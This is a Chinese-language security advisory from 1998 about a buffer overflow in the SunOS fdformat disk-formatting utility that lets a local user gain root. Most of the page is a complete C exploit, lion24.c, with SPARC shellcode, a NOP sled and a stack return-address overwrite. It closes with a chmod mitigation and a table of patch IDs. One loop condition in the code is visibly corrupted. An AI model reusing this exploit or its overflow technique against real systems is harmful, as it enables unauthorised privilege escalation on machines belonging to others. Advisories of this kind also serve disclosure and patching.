安全研究

安全漏洞
SunOS fdformat 溢出漏洞

发布日期:1998-03-11
更新日期:1998-03-11

受影响系统:
SunOS versions 5.3,  5.4, 5.5, 5.5_x86,  5.5.1, and 5.5.1_x86
描述:
fdformat是用来格式化磁盘的程序。他导致的溢出漏洞将使用户获取root权限。





测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

以下是检测此漏洞的C代码:

    ------------------------- lion24.c -------------------------------*/

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>

    #define BUF_LENGTH 264
    #define EXTRA 36
    #define STACK_OFFSET -56
    #define SPARC_NOP 0xa61cc013

    u_char sparc_shellcode[] =

    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
    "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
    "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
    "\x91\xd0\x20\x08"
    ;

    u_long get_sp(void)
    {
    __asm__("mov %sp,%i0 \n");
    }

    void main(int argc, char *argv[])
    {
    char buf[BUF_LENGTH + EXTRA + 8];
    long targ_addr;
    u_long *long_p;
    u_char *char_p;
    int i, code_length = strlen(sparc_shellcode),dso=0;

    if(argc > 1) dso=atoi(argv[1]);

    long_p =(u_long *) buf ;
    targ_addr = get_sp() - STACK_OFFSET - dso;

    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

    char_p = (u_char *) long_p;

    for (i = 0; i  code_length; i++)
    *char_p++ = sparc_shellcode[i];

    long_p = (u_long *) char_p;

    for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ =targ_addr;

    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
    targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
    execl("/bin/fdformat", "fdformat   ", &buf[0],(char *) 0);
    perror("execl failed");
    }

/*-------------------------- end of lion24.c -----------------------*/





建议:
chmod 555 /usr/bin/fdformat

        OS version              Patch ID
        ----------              --------
        SunOS 5.5.1             104776-01
        SunOS 5.5.1_x86         104777-01
        SunOS 5.5               103024-02
        SunOS 5.5_x86           103044-02
        SunOS 5.4               101907-14
        SunOS 5.4_x86           101908-14
        SunOS 5.3               101331-07






浏览次数:21779
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障